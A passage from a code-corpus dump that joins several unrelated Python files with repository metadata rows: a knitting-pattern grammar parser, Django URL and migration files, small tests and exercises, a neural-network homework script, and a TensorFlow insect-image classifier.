        nodes[3] is the repetition count or None (defaulting to 1)
    :return: (stitch statement list, (True, repetition_count))
    """
    repeats = nodes[3]
    if repeats is None:
        repeats = 1
        nodes[3] = repeats
    return nodes[1], (True, repeats)
@action
def conditional_stitch_group(_, nodes: list) -> Tuple[List[Tuple], Tuple[bool, int]]:
    """
    Reduce a stitch group repeated until a condition is met.
    :param _: the context passed by parglare but not used
    :param nodes: nodes[1] is the stitch statement list to be repeated;
        nodes[3] is the repeat-condition tuple produced by rep_condition
    :return: (stitch statement list, repeat condition)
    """
    statements = nodes[1]
    condition = nodes[3]
    return statements, condition
@action
def between_courses(context, nodes) -> Union[Iterator_Closure, List[int]]:
    """
    process statement iterated courses to a list of course_ids
    :param context: used to reach the parser symbol table when either bound
        is a Num_Closure (deferred evaluation via an Iterator_Closure)
    :param nodes: the nodes from the statement to process; nodes[2]/nodes[4]
        are the start/end course numbers, nodes[1] an optional side to exclude
    :return: list of course ids, or an Iterator_Closure for deferred ranges
    """
    start_num = nodes[2]
    end_num = nodes[4]
    include_ws = True
    include_rs = True
    side_exclusion = nodes[1]
    if side_exclusion is not None:
        # naming note: the side keyword selects which side to KEEP — "ws"
        # drops right-side rows and vice versa
        if side_exclusion == "ws":
            include_rs = False
        elif side_exclusion == "rs":
            include_ws = False
    if isinstance(start_num, Num_Closure) or isinstance(end_num, Num_Closure):
        # bounds are symbolic: defer range expansion until evaluation time
        return Iterator_Closure(context.parser.symbolTable, include_rs, include_ws, start_num, end_num)
    else:
        ints = []
        for i in range(start_num, end_num + 1):
            # odd course numbers are right-side rows, even are wrong-side
            if i % 2 == 1 and include_rs:
                ints.append(i)
            elif i % 2 == 0 and include_ws:
                ints.append(i)
        return ints
@action
def rep_condition(_, nodes: list) -> Tuple[bool, Union[int, Num_Closure]]:
    """
    Parse a repeat-until condition into repeat-policy form.

    :param _: the context passed by parglare but not used
    :param nodes: the parsed condition tokens; the last token is "end",
        "st", or "sts"
    :return: (False, remaining) where the False flag marks a stitch-count
        policy and remaining is how many stitches must be left when the
        repetition stops
    """
    if len(nodes) == 2:
        # "... end": repeat until no stitches remain
        assert nodes[1] == "end"
        remaining_sts = 0
    elif len(nodes) == 3:
        # "... st": exactly one stitch remains
        assert nodes[2] == "st"
        remaining_sts = 1
    else:
        # "... <n> sts": n stitches remain
        assert len(nodes) == 4 and nodes[3] == "sts"
        remaining_sts = nodes[2]
    return False, remaining_sts
@action
def rowOrRound(_, nodes: str) -> str:
    """
    Validate the row/round marker of a construction statement.

    :param _: context passed by parglare but not used
    :param nodes: the string marking the type of construction
    :return: the marker unchanged, e.g. "row" or "rows"
    :raises AssertionError: if the marker mentions "round", which is unsupported
    """
    if "round" in nodes:
        # raise explicitly instead of `assert False`: asserts are silently
        # stripped when Python runs with optimizations (-O), which would let
        # unsupported "round" constructions slip through
        raise AssertionError("Rounds not yet supported in KS2.0")
    return nodes
@action
def num_assign(context: Context, nodes: list) -> Num_Assignment_Closure:
    """
    Parse a definition of a variable number and record it in the symbol table.

    :param context: context used to access the symbol table for storing the definition
    :param nodes: nodes[0] the symbol name, nodes[2] the numeric expression
        assigned to it
    :return: a closure binding the symbol to the expression in the symbol table
    """
    symbol = nodes[0]
    data = nodes[2]
    return Num_Assignment_Closure(context.parser.symbolTable, symbol, data)
@action
def num_id(context: Context, nodes: list) -> Num_Variable_Closure:
    """
    Look up a numeric variable by its keyword.

    :param context: parglare context, used to reach the symbol table
    :param nodes: nodes[0] is the keyword naming the numeric value
    :return: a closure that resolves the keyword against the symbol table
    """
    return Num_Variable_Closure(context.parser.symbolTable, nodes[0])
@action
def num_exp(context, nodes: list) -> Union[int, Num_Closure]:
    """
    Resolve a numeric expression node.

    :param context: used to reach the symbol table for the current-row closure
    :param nodes: nodes[0] is either a non-negative int, the keyword
        "currow", or an already-built numeric closure
    :return: the integer, a Current_Row_Closure for "currow", or the node unchanged
    :raises AssertionError: if an integer node is negative
    """
    first = nodes[0]
    # isinstance is the idiomatic type check (was `type(...) is int/str`)
    if isinstance(first, int):
        assert first >= 0, f"Non Negative Numbers:{first}"
    elif isinstance(first, str) and first == "currow":
        return Current_Row_Closure(context.parser.symbolTable)
    return nodes[0]
@action
def num_op(context, nodes: list) -> Union[int, Operation_Closure]:
    """
    Evaluate a binary numeric operation, eagerly when both operands are plain
    integers and lazily (as a closure) otherwise.

    :param context: parglare context, used for the symbol table when a closure is needed
    :param nodes: the operation tokens, optionally preceded by an opening "("
    :return: the computed value, or an Operation_Closure deferring the computation
    """
    # skip a leading "(" so the operand/operator positions line up
    offset = 1 if nodes[0] == "(" else 0
    lhs = nodes[offset]
    op = nodes[offset + 1]
    rhs = nodes[offset + 2]
    if type(lhs) is int and type(rhs) is int:  # both known -- evaluate now
        if op == "+":
            return lhs + rhs
        elif op == "-":
            return lhs - rhs
        elif op == "*":
            return lhs * rhs
        elif op == "/":
            return lhs / rhs
    else:
        # at least one operand is still symbolic -- defer the operation
        return Operation_Closure(context.parser.symbolTable, lhs, op, rhs)
def _stripToDigits(text: str) -> str:
digits = ""
for c in text:
if c.isdigit():
digits += c
return digits
@action
def integer(_, node: str) -> int:
    """
    Convert a number token to an int, ignoring any stray non-digit characters.

    :param _: context not used
    :param node: the number string
    :return: the integer specified
    """
    return int(_stripToDigits(node))
@action
def opId(context: Context, nodes: List[str]) -> Union[Stitch_Definition, Cable_Definition]:
    """
    Resolve a stitch identifier to its stored definition.

    :param context: context used to access the symbol table
    :param nodes: nodes[0] is the identifier naming the stitch type
    :return: the stitch definition or cable definition keyed to this term
    :raises AssertionError: if the identifier has no entry in the symbol table
    """
    currentSymbolTable = context.parser.symbolTable
    assert nodes[0] in currentSymbolTable, "No stitch defined ID={}".format(nodes[0])
    return currentSymbolTable[nodes[0]]
| [
"hofmann.megan@gmail.com"
] | hofmann.megan@gmail.com |
24948c5e9cc6f4ade5f814b095ccb9c0319bae21 | 688788c577776b945f1965187d404757b687c8e1 | /appmine/appmine/urls.py | 6c2b929fe2c6afbf205967368e44be58babfa85a | [] | no_license | 3Labs/AppMine | 8d01b1a39c319201de6ba323cb0fcf3d2d95dd62 | fa68aac46ecad1667610f8cbbd89e2b8eb682004 | refs/heads/master | 2020-07-23T16:36:35.584685 | 2019-09-10T20:33:19 | 2019-09-10T20:33:19 | 207,631,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | """financialchat URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include,url
from django.contrib import admin
from django.contrib.auth import views as auth_views
# URL routing table: the site root serves the login view, /chat/ is handled
# by the chat app, /admin/ by the Django admin, and /accounts/ by Django's
# built-in auth URLs.
urlpatterns = [
    url(r'^$', auth_views.login),
    url(r'^chat/', include('chat.urls')),
    url(r'^admin/', admin.site.urls),
    url(r'^accounts/', include('django.contrib.auth.urls'))
]
| [
"tri3labs@gmail.com"
] | tri3labs@gmail.com |
917caa8803de6237510c15044bfbe71ebee37d83 | 4564fd0cfb9009f0b85d15c3b9164b865c4c86e7 | /tests/test_model.py | 6640508bf3a1581cded6a9fe52d2d2d572937326 | [
"Apache-2.0"
] | permissive | rajaramcomputers/client | 0188a1cf8e989dcd180c280a4db4d00c44bac390 | 65badf61fb9a5430596d6d2c0b9b7833cf30ec06 | refs/heads/master | 2021-01-16T21:59:35.657394 | 2016-02-01T22:08:18 | 2016-02-01T22:08:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | """ run with
nosetests -v --nocapture tests/test_model.py
or
nosetests -v tests/test_model.py
"""
from __future__ import print_function
from pprint import pprint
from cloudmesh_base.util import HEADING
import cloudmesh_client.db
import cloudmesh_client.db.model
class Test_model:
    """Smoke tests for the cloudmesh_client.db table helpers."""
    def setup(self):
        # nothing to prepare; the tests only read module-level metadata
        pass
    def tearDown(self):
        pass
    def test_001(self):
        HEADING()
        # passes as long as tables() does not raise
        pprint(cloudmesh_client.db.tables())
        assert True
    def test_002(self):
        HEADING()
        print(cloudmesh_client.db.tablenames())
        assert True
    def test_003(self):
        HEADING()
        # look up each table object by its name
        for name in cloudmesh_client.db.tablenames():
            print(cloudmesh_client.db.table(name))
        assert True
| [
"laszewski@gmail.com"
] | laszewski@gmail.com |
ba1f5e9dd3eb7cd681014c2d6378586c4ecae990 | 6ce1b574542eacf8c416d0e3d8499e649f76181b | /CursoIntensPython/exerc_4.11.5.py | 280f966d22fcbb683b0eca60fc43952453bea556 | [] | no_license | AlvanDeMelo/CODIGOS-PESSOAIS | ea9f7733c94d3f8162ecc0d3147f04e6f6db9110 | d905277285806c3ad363e2def6ab17bf1b1264b6 | refs/heads/master | 2023-04-22T23:45:32.157509 | 2021-04-22T20:46:21 | 2021-04-22T20:46:21 | 293,786,965 | 1 | 0 | null | 2021-04-17T19:46:39 | 2020-09-08T11:15:54 | Python | UTF-8 | Python | false | false | 252 | py | #Exercicio 4.11.5 Os 3 itens do meio com método for
#Lista
comidas = ['arroz','feijão','batata','hamburguer','milkshake']
#Exibe o 3 ultimos sabores
print('Os 3 intens do meio da lista são: ')
for comida in comidas[1:4]:
print(comida.title())
| [
"noreply@github.com"
] | noreply@github.com |
99d69fd47889f9ce0d7b1d153f7192df5ac02b56 | ea1b340ccc3c151f508df6a7e7ab8701cd5c5cb5 | /Experiment Processing/recommender/voting_rules/average.py | 2a5cf2635c002c3d69a5d93f1137feacb84964f3 | [
"MIT"
] | permissive | abansagi/GroupRecommendationThesis | a0ed6effe93c5acd65d1e6c462ba3443869b7645 | 4a4b8c2f230d7db3b6b36342ab06b02f146462ae | refs/heads/main | 2023-04-18T16:19:58.468381 | 2021-11-17T14:16:05 | 2021-11-17T14:16:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from recommender.voting_rules.abstract_voting_rule import AbstractVotingRule
class Average(AbstractVotingRule):
"""
"Average" aggregation strategy, works by calculating the average rating for each song.
"""
def get_name(self):
return "Average"
def voting_rule(self, song, song_ratings):
average = 0
for user in song_ratings:
average += song_ratings[user]
return average / len(song_ratings)
| [
"aurelbansagi@gmail.com"
] | aurelbansagi@gmail.com |
7debab71f5c3def961101e6b1dc4e0993a4717e7 | cd835e889bce6f1a9cff91b764ab19ad70ff4134 | /repository/migrations/0004_auto_20180327_0327.py | 1ca152e43e6eae7c5e222760282eecde464e1312 | [] | no_license | dabingya/cmdb | 781ff842714ceda0904796858a938e8aece594dd | 731a1a036aca7002398b8c8a72a9d167b1236b64 | refs/heads/master | 2020-03-19T07:23:02.206823 | 2018-07-09T01:11:56 | 2018-07-09T01:11:56 | 136,109,091 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,087 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-27 03:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Adds the Asset model and extends IDC/Server/Domain/Team fields."""
    dependencies = [
        ('repository', '0003_connect_domain_userprofile'),
    ]
    operations = [
        # new Asset table recording a host's OS and hardware facts
        migrations.CreateModel(
            name='Asset',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('release', models.CharField(max_length=20, verbose_name='系统版本')),
                ('kernel_version', models.CharField(max_length=20, verbose_name='内核版本')),
                ('cpu_type', models.CharField(max_length=50, verbose_name='CPU型号')),
                ('cpu_nums', models.IntegerField(default=0, verbose_name='CPU个数')),
                ('mem', models.FloatField(default=0.0, verbose_name='内存')),
                ('swap', models.FloatField(default=0.0, verbose_name='swap')),
            ],
        ),
        # memory field added to the IDC model
        migrations.AddField(
            model_name='idc',
            name='mem',
            field=models.FloatField(default=0.0, verbose_name='内存'),
        ),
        # environment classification for servers (test/prod/preprod/base)
        migrations.AddField(
            model_name='server',
            name='env_status',
            field=models.CharField(choices=[('test', '测试'), ('prod', '生产'), ('preprod', '预生产'), ('base', '基础')], default='测试', max_length=20, verbose_name='所属环境'),
        ),
        # NOTE: the string date defaults below were frozen at makemigrations
        # time (2018-03-27); they are static values, not "today".
        migrations.AlterField(
            model_name='domain',
            name='datetime',
            field=models.DateField(default='2018-03-27', verbose_name='到期时间'),
        ),
        migrations.AlterField(
            model_name='idc',
            name='create_at',
            field=models.DateField(default='2018-03-27', verbose_name='创建时间'),
        ),
        migrations.AlterField(
            model_name='team',
            name='create_at',
            field=models.DateField(default='2018-03-27', verbose_name='创建时间'),
        ),
    ]
| [
"547684265@qq.com"
] | 547684265@qq.com |
441d4b4c3c29fbcd3fd0ed67763e1ad1e0832f34 | 7804c198ae1e6a56c20ebc87071b16bb24d190be | /Proj1.py | a2258dc408d5496aca532572327f431de268f621 | [] | no_license | nilesh12121996/Breast-Cancer-Classification | c989bfdf35cea292efd20e6622c581f7b60cc4f9 | a41d103bb893a1de579fca7353277657e6a5cf4e | refs/heads/main | 2023-07-03T17:26:23.798299 | 2021-08-06T20:35:57 | 2021-08-06T20:35:57 | 393,495,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,435 | py | import sys
import numpy as np
import pandas as pd
from scipy import signal
###################
## Solver for single layer network of three hidden nodes.
## Output node has no bias but hidden nodes have bias.
## We automatically accounted for this by adding an extra
## column of 1's to the input data.
## return [W, w] where the rows of W are the three hidden
## node weights and w are the output node weights
###################
def back_prop(traindata, trainlabels):
    """
    Train a one-hidden-layer network (3 sigmoid hidden nodes, linear output
    node without bias) by full-batch gradient descent.

    Relies on the module-level globals `rows` and `cols` for the training
    matrix dimensions; the bias of each hidden node is folded into the
    weights via the column of ones appended to the data in main.

    :param traindata: (rows x cols) input matrix, bias column included
    :param trainlabels: vector of rows target labels
    :return: [W, w] -- hidden-layer weights (3 x cols, one row per hidden
        node) and output-node weights (length 3)
    """
    ##############################
    ### Initialize all weights ###
    W = np.random.rand(3, cols)
    w = np.random.rand(3)
    ###################################################
    ### Calculate initial objective in variable obj ###
    obj = 0
    hidd_layers = np.matmul(traindata, np.transpose(W))
    sigmoid = lambda x: 1/(1+np.exp(-x))
    hidd_layers = np.array([sigmoid(xi) for xi in hidd_layers])
    out_layer = np.matmul(hidd_layers,np.transpose(w))
    obj = np.sum(np.square(out_layer - trainlabels))
    ###############################
    ### Begin gradient descent ####
    stop = 0.001
    epochs = 1000
    eta = .001
    prevobj = np.inf
    i = 0
    # loop until the objective improvement falls below `stop` or `epochs`
    # iterations have run
    while (prevobj - obj > stop and i < epochs):
        # Update previous objective
        prevobj= obj
        # Calculate gradient update dellw for output node w
        # dellw is the same dimension as w
        # (uses the hidden activations computed at the previous objective
        # evaluation; residual = prediction - label per training row)
        delw= (np.dot(hidd_layers[0,:],w)-trainlabels[0])*hidd_layers[0,:]
        for j in range(1,rows):
            delw += (np.dot(hidd_layers[j,:],np.transpose(w))-trainlabels[j])*hidd_layers[j,:]
        # Update w
        w= w - eta*delw
        # Calculate gradient update dellW for hidden layer weights W.
        # dellW has to be of same dimension as W.
        # Follow the steps below.
        # Our three hidden nodes are s, u, and v.
        # Let us first calculate dells. After that we do dellu and dellv.
        # Recall that dells = df/dz1 * (dz1/ds1, dz1,ds2)
        # NOTE: the hidden-layer gradients below use the already-updated w,
        # matching the original update order.
        dels= np.sum(np.dot(hidd_layers[0,:],w)-trainlabels[0])*w[0]*hidd_layers[0,0]*(1-hidd_layers[0,0])*traindata[0,:]
        for j in range(1, rows):
            dels = dels+ np.sum(np.dot(hidd_layers[j, :], w) - trainlabels[j]) * w[0] * hidd_layers[j, 0] * (
                    1 - hidd_layers[j, 0]) * traindata[j, :]
        # Calculate dellu
        delu = np.sum(np.dot(hidd_layers[0, :], w) - trainlabels[0]) * w[1] * hidd_layers[0, 1] * (
                1 - hidd_layers[0, 1]) * traindata[0, :]
        for j in range(1, rows):
            delu = delu + np.sum(np.dot(hidd_layers[j, :], w) - trainlabels[j]) * w[1] * hidd_layers[j, 1] * (
                    1 - hidd_layers[j, 1]) * traindata[j, :]
        # Calculate dellv
        delv = np.sum(np.dot(hidd_layers[0, :], w) - trainlabels[0]) * w[2] * hidd_layers[0, 2] * (
                1 - hidd_layers[0, 2]) * traindata[0, :]
        for j in range(1, rows):
            delv = delv + np.sum(np.dot(hidd_layers[j, :], w) - trainlabels[j]) * w[2] * hidd_layers[j, 2] * (
                    1 - hidd_layers[j, 2]) * traindata[j, :]
        # Put dells, dellu, and dellv as rows of dellW
        delW= np.array([dels,delu,delv])
        # Update W
        W= W - eta*delW
        # Recalculate objective
        hidd_layers=np.matmul(traindata ,np.transpose(W))
        hidd_layers= np.array([sigmoid(xi) for xi in hidd_layers])
        out_layer = np.matmul(hidd_layers, np.transpose(w))
        obj = np.sum(np.square(out_layer - trainlabels))
        # Update i and print objective (comment print before final submission)
        i = i + 1
        print("i=", i, " Objective=", obj)
    return [W, w]
###################
## Stochastic gradient descent for same network as above
## return [W, w] where the rows of W are the three hidden
## node weights and w are the output node weights
###################
def sgd(traindata, trainlabels, batch_size):
    """
    Train the single-hidden-layer network with mini-batch stochastic
    gradient descent.

    Fixes over the previous version:
      * mini-batches are drawn by sampling row indices, so rows and labels
        stay aligned (the old code shuffled `traindata` in place without
        shuffling `trainlabels`, corrupting the data/label pairing);
      * hidden-layer activations are recomputed for every mini-batch
        instead of being reused from the very first batch.

    Relies on the module-level global `cols` for the input width.

    :param traindata: (rows x cols) input matrix, bias column included;
        left unmodified
    :param trainlabels: vector of target labels, one per row
    :param batch_size: number of rows sampled per update step
    :return: [W, w] -- the best hidden-layer weights (3 x cols) and output
        weights (length 3) found during training
    """
    sigmoid = lambda x: 1 / (1 + np.exp(-x))
    n = traindata.shape[0]
    ##############################
    ### Initialize all weights ###
    best_W = np.random.rand(3, cols)
    best_w = np.random.rand(3)
    ### Objective of the current best weights over the full training set ###
    hidden = sigmoid(np.matmul(traindata, np.transpose(best_W)))
    prevobj = np.sum(np.square(np.matmul(hidden, best_w) - trainlabels))
    epochs = 1000
    eta = .1
    for i in range(epochs):
        # start each step from the best weights found so far
        W = best_W.copy()
        w = best_w.copy()
        # sample a mini-batch of row indices so data and labels stay paired
        idx = np.random.permutation(n)[:batch_size]
        mini_data = traindata[idx]
        mini_labels = trainlabels[idx]
        mini_hidden = sigmoid(np.matmul(mini_data, np.transpose(W)))
        # gradient for the output node: residual-weighted hidden activations
        residual = np.matmul(mini_hidden, w) - mini_labels
        delw = np.matmul(residual, mini_hidden)
        w = w - eta * delw
        # gradient for each hidden node's weights; recompute the residual
        # with the updated w to match the original update order
        residual = np.matmul(mini_hidden, w) - mini_labels
        delW = np.empty_like(W)
        for node in range(3):
            coeff = residual * w[node] * mini_hidden[:, node] * (1 - mini_hidden[:, node])
            delW[node] = np.matmul(coeff, mini_data)
        W = W - eta * delW
        # evaluate the updated weights on the full training set
        hidden = sigmoid(np.matmul(traindata, np.transpose(W)))
        obj = np.sum(np.square(np.matmul(hidden, w) - trainlabels))
        # keep the weights only when they improve on the best objective
        if obj < prevobj:
            prevobj = obj
            best_w = w
            best_W = W
        print("i=", i + 1, " Objective=", obj)
    return [best_W, best_w]
###################
## Back propagation gradient descent for a simple convolutional
## neural network containing one 2x2 convolution with global
## average pooling.
## Input to the network are 3x3 matrices.
## return the 2x2 convolutional kernel
###################
def convnet(traindata, trainlabels):
    """
    Train a tiny convolutional network (one 2x2 kernel, sigmoid activation,
    global average pooling) on 3x3 input images by gradient descent.

    Fixes over the previous version:
      * uses the `trainlabels` parameter instead of the module-level
        `labels` variable;
      * keeps a dedicated epoch counter (the old code reused the inner
        data-loop variable `i` in the while condition, so epochs were
        never actually counted);
      * defines the sigmoid locally so the function does not depend on a
        module-level helper.

    :param traindata: sequence of 3x3 image matrices
    :param trainlabels: sequence of target labels, one per image
    :return: the learned 2x2 convolution kernel
    """
    stop = 0.001
    epochs = 1000
    eta = .1
    n = len(trainlabels)
    sig = lambda x: 1 / (1 + np.exp(-x))
    c = np.ones((2, 2))
    def _objective(kernel):
        # sum of squared errors of the pooled activation against the labels
        total = 0.0
        for t in range(n):
            hidden = sig(signal.convolve2d(traindata[t], kernel, mode='valid'))
            total += (np.mean(hidden) - trainlabels[t]) ** 2
        return total
    obj = _objective(c)
    prevobj = np.inf
    epoch = 0
    while prevobj - obj > stop and epoch < epochs:
        prevobj = obj
        grad = np.zeros((2, 2))
        for t in range(n):
            hidden = sig(signal.convolve2d(traindata[t], c, mode='valid'))
            err = np.mean(hidden) - trainlabels[t]
            dsig = hidden * (1 - hidden)  # sigmoid derivative at each map cell
            # NOTE(review): convolve2d flips the kernel, while this gradient
            # (kept from the original) assumes correlation indexing.
            for a in range(2):
                for b in range(2):
                    # d z[j][k] / d c[a][b] = sigmoid'(z[j][k]) * x[j+a][k+b]
                    g = 0.0
                    for j in range(2):
                        for k in range(2):
                            g += dsig[j][k] * traindata[t][j + a][k + b]
                    # the original scales each kernel gradient by 1/2
                    grad[a][b] += err * g / 2
        c = c - eta * grad
        obj = _objective(c)
        epoch += 1
    return c
###############
#### MAIN #####
###############
#######################################
### Read data for back_prop and sgd ###
#######################################
# Each row: label in column 0, features afterwards.
f = open(sys.argv[1])
data = np.loadtxt(f)
train = data[:, 1:]
trainlabels = data[:, 0]
# append a column of ones so each hidden node's bias is folded into its weights
onearray = np.ones((train.shape[0], 1))
train = np.append(train, onearray, axis=1)
f = open(sys.argv[2])
data = np.loadtxt(f)
test = data[:, 1:]
testlabels = data[:, 0]
onearray = np.ones((test.shape[0], 1))
test = np.append(test, onearray, axis=1)
# globals consumed by back_prop/sgd
rows = train.shape[0]
cols = train.shape[1]
hidden_nodes = 3
#########################
### Read data for convnet
#########################
# Each image is a 3x3 matrix stored in its own text file, listed in data.csv.
traindir = sys.argv[3]
df = pd.read_csv(traindir + '/data.csv') # load images' names and labels
names = df['Name'].values
labels = df['Label'].values
traindata = np.empty((len(labels), 3, 3), dtype=np.float32)
for i in range(0, len(labels)):
    image_matrix = np.loadtxt(traindir + '/' + names[i])
    traindata[i] = image_matrix
testdir = sys.argv[4]
df = pd.read_csv(testdir + '/data.csv') # load images' names and labels
names2 = df['Name'].values
labels2 = df['Label'].values
testdata = np.empty((len(labels2), 3, 3), dtype=np.float32)
for i in range(0, len(labels2)):
    image_matrix = np.loadtxt(testdir + '/' + names2[i])
    testdata[i] = image_matrix
#######################
#### Train the networks
#######################
## Helper function
sigmoid = lambda x: 1 / (1 + np.exp(-x))
[W, w] = back_prop(train, trainlabels)
# A small batch size such as even 2 or 5 will also work
batch_size = 5
[W2, w2] = sgd(train, trainlabels, batch_size)
c = convnet(traindata, labels)
##################################
#### Classify test data as 1 or -1
##################################
# Back-prop network: forward pass on the test set, then threshold at 0.
bp_hidd_layers = np.matmul(test, np.transpose(W))
bp_hidd_layers = np.array([sigmoid(xi) for xi in bp_hidd_layers])
bp_out_layer = np.matmul(bp_hidd_layers, np.transpose(w))
for i in range(bp_out_layer.shape[0]):
    if bp_out_layer[i] > 0:
        bp_out_layer[i] = 1
    else:
        bp_out_layer[i] = -1
# `with` closes each output file (the old code leaked the handles it opened)
with open("back_prop_predictions", 'w') as OUT:
    OUT.write(str(bp_out_layer))
# SGD network: same procedure with the SGD-trained weights.
sgd_hidd_layers = np.matmul(test, np.transpose(W2))
sgd_hidd_layers = np.array([sigmoid(xi) for xi in sgd_hidd_layers])
sgd_out_layer = np.matmul(sgd_hidd_layers, np.transpose(w2))
for i in range(sgd_out_layer.shape[0]):
    if sgd_out_layer[i] > 0:
        sgd_out_layer[i] = 1
    else:
        sgd_out_layer[i] = -1
with open("sgd_predictions", 'w') as OUT:
    OUT.write(str(sgd_out_layer))
## For the convnet print the 2x2 kernel c in the
## first two lines. In the following lines print
## the test predictions.
with open("convnet_output", 'w') as OUT:
    OUT.write(str(c) + '\n')
    for i in range(0, len(labels2)):
        cnn_hid_layers = signal.convolve2d(testdata[i], c, mode='valid')
        for j in range(0, 2, 1):
            for k in range(0, 2, 1):
                cnn_hid_layers[j][k] = sigmoid(cnn_hid_layers[j][k])
        cnn_output_layer = (cnn_hid_layers[0][0] + cnn_hid_layers[0][1] + cnn_hid_layers[1][0] + cnn_hid_layers[1][1]) / 4
        # pooled sigmoid activation lies in (0, 1): threshold at 0.5
        if (cnn_output_layer < 0.5):
            OUT.write(str(-1) + '\n')
        else:
            OUT.write(str(1) + '\n')
| [
"noreply@github.com"
] | noreply@github.com |
16c2df00ba5b93c7a908956911ca1c69f0531f1d | 318f9349aa8148e432ec70c9c10cddd1390a4071 | /predict.py | dac862c2c3bf6d7f6f949a74a5ca9be684412c78 | [] | no_license | wangjianqun1/Insect_Recognition | cc24d022f16ea424d323df578560301f47dcceca | 2765f6c3e8c38272ba27fb0d7b4858bb122620b8 | refs/heads/main | 2023-06-17T17:41:56.245821 | 2021-07-14T16:47:20 | 2021-07-14T16:47:20 | 386,003,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,163 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from skimage import io, transform
import tensorflow as tf
import numpy as np
tf = tf.compat.v1
# Paths of one sample image per insect class used for prediction.
path1 = ".\insecttest/草履蚧/709.jpg"
path2 = ".\insecttest/褐边绿刺蛾/成虫.jpg"
path3 = ".\insecttest/黄刺蛾/成虫.jpg"
path4 = ".\insecttest/柳蓝叶甲/666 (10).jpg"
path5 = ".\insecttest/麻皮蝽/667麻皮蝽.jpg"
path6 = ".\insecttest/美国白蛾/888 (33).jpg"
path7 = ".\insecttest/人纹污灯蛾/999 (43).jpg"
path8 = ".\insecttest/日本脊吉丁/580日本脊吉丁.jpg"
path9 = ".\insecttest/桑天牛/499.jpg"
path10 = ".\insecttest/霜天蛾/104 (19).jpg"
path11 = ".\insecttest/丝带凤蝶/009丝带凤蝶.jpg"
path12 = ".\insecttest/松墨天牛/222 (27).jpg"
path13 = ".\insecttest/星天牛/1876-1F42Q619393M.jpg"
path14 = ".\insecttest/杨扇舟蛾/426.jpg"
path15 = ".\insecttest/杨小舟蛾/426杨小舟蛾.jpg"
# Maps the network's class index to the insect name (the name `flower_dict`
# is a leftover from a flower-classification example).
flower_dict = {0:'丝带凤蝶',1:'人纹污灯蛾',2:'日本脊吉丁',3:'星天牛',4:'杨小舟蛾',5:'杨扇舟蛾',6:'松墨天牛',7:'柳蓝叶甲'
    ,8:'桑天牛',9:'美国白蛾',10:'草履蚧',11:'褐边绿刺蛾',12:'霜天蛾',13:'麻皮蝽',14:'黄刺蛾'}
# Model input size: 100x100 pixels, 3 color channels.
w = 100
h = 100
c = 3
def read_one_image(path):
    """
    Load an image from *path*, resizing 3-channel (RGB) images to (w, h).

    :param path: path of the image file to read
    :return: the image as a numpy array, or None when the image has no
        channel axis (grayscale) and cannot be fed to the model
    """
    img = io.imread(path)
    try:
        if img.shape[2] == 3:
            img = transform.resize(img, (w, h))
    except IndexError:
        # catch only the missing-channel-axis case instead of a bare
        # `except:` that silently swallowed every error
        return None
    # NOTE(review): images with a different channel count (e.g. RGBA) fall
    # through un-resized, as in the original -- confirm this is intended.
    return np.asarray(img)
# Load the 15 sample images, restore the trained model from its checkpoint,
# and print the predicted class for each image.
with tf.Session() as sess:
    data = []
    data1 = read_one_image(path1)
    data2 = read_one_image(path2)
    data3 = read_one_image(path3)
    data4 = read_one_image(path4)
    data5 = read_one_image(path5)
    data6 = read_one_image(path6)
    data7 = read_one_image(path7)
    data8 = read_one_image(path8)
    data9 = read_one_image(path9)
    data10 = read_one_image(path10)
    data11 = read_one_image(path11)
    data12 = read_one_image(path12)
    data13 = read_one_image(path13)
    data14 = read_one_image(path14)
    data15 = read_one_image(path15)
    data.append(data1)
    data.append(data2)
    data.append(data3)
    data.append(data4)
    data.append(data5)
    data.append(data6)
    data.append(data7)
    data.append(data8)
    data.append(data9)
    data.append(data10)
    data.append(data11)
    data.append(data12)
    data.append(data13)
    data.append(data14)
    data.append(data15)
    # restore the graph and the latest trained weights from the checkpoint
    saver = tf.train.import_meta_graph('.\model\model.ckpt.meta')
    saver.restore(sess, tf.train.latest_checkpoint('.\model'))
    graph = tf.get_default_graph()
    x = graph.get_tensor_by_name("x:0")
    feed_dict = {x: data}
    logits = graph.get_tensor_by_name("logits_eval:0")
    classification_result = sess.run(logits, feed_dict)
    # print the prediction matrix
    print(classification_result)
    # print the index of the maximum value in each row of the prediction matrix
    print(tf.argmax(classification_result, 1).eval())
    # map each index to its class name via the dictionary
    output = []
    output = tf.argmax(classification_result, 1).eval()
    for i in range(len(output)):
        print("第", i + 1, "朵花预测:" + flower_dict[output[i]])
        print(output[i])
| [
"noreply@github.com"
] | noreply@github.com |
a9e2cbb4176684f4ffa52c1888fae3102c5fa7b6 | 9b59f76f3b312951519a15651290476c34a54174 | /QUANTAXIS_Test/QABacktest_Test/QABacktestSimple_Test.py | 37e9feda4909d833898186c4d41be55ad36d35fd | [
"MIT"
] | permissive | sjtututu/QUANTAXIS | b8d9ba35d20159680f25cd3e583ebcfc7ff34c75 | e9e20cdeda8b8d132433037b639a7e60f286a190 | refs/heads/master | 2020-08-16T11:19:19.689925 | 2020-02-22T01:21:57 | 2020-02-22T01:21:57 | 215,495,655 | 1 | 0 | MIT | 2019-12-28T08:13:57 | 2019-10-16T08:22:54 | Python | UTF-8 | Python | false | false | 4,471 | py | import unittest
import numpy as np
import pandas as pd
import QUANTAXIS as QA
class QABacktestSimple_Test(unittest.TestCase):
